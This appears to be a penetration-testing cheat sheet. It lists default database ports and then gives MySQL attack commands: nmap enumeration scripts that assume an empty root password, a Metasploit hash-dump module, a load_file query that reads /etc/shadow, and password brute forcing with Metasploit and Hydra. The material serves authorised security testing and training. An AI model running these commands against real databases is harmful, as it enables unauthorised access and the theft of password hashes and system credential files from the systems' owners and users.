Structured Query Language (SQL) is a standardized programming language that is used to manage relational databases and perform various operations on the data in them.
Relational databases default ports
Database
Port(s)
Doc
MaxDB
7210
MySQL
3306
Oracle DB
1521, 1830
PostgreSQL
5432
SQL Server (MSSQL)
1433, 1434
NoSQL databases and other data stores default ports
Database
Port(s)
Doc
Cassandra
7000, 7001, 9042
CouchDB
5984
Elasticsearch
9200, 9300
MongoDB
27017, 27018, 27019, 28017
Neo4J
7473, 7474
Redis
6379
Enum
# Default scan
nmap $IP -sV -p 3306
# Empty password script
nmap $IP -sV -p 3306 --script=mysql-empty-password
# Get Mysql info
nmap $IP -sV -p 3306 --script=mysql-info
# Get mysql users
nmap $IP -sV -p 3306 --script=mysql-users --script-args="mysqluser='root',mysqlpass=''"
# Get mysql databases
nmap $IP -sV -p 3306 --script=mysql-databases --script-args="mysqluser='root',mysqlpass=''"
# Get mysql variables
nmap $IP -sV -p 3306 --script=mysql-variables --script-args="mysqluser='root',mysqlpass=''"
# mysql audit
nmap $IP -sV -p 3306 --script=mysql-audit --script-args="mysql-audit.username='root',mysql-audit.password='',mysql-audit.filename='/usr/share/nmap/nselib/data/mysql-cis.audit'"
# Try to connect directly without a password
mysql -h $IP -u root
# Run query
nmap $IP -sV -p 3306 --script=mysql-query --script-args="query='select count(*) from books.authors;',mysqluser='root',mysqlpass=''"
# Metasploit way
msfconsole
set dir_list /usr/share/metasploit-framework/data/wordlists/directory.txt
setg rhosts $IP
set verbose false
run
## Hashdump
msfconsole
use auxiliary/scanner/mysql/mysql_hashdump
setg rhosts $IP
set username root
set password ""
run
Manipulate local files via db
# connect to instance
mysql -h $IP -u root
# read local file
select load_file("/etc/shadow");
Bruteforce
# Metasploit way
msfconsole
use auxiliary/scanner/mysql/mysql_login
setg rhosts $IP
set verbose false
set stop_on_success true
set pass_file /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set username root
run
# Hydra
hydra -l root -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt $IP mysql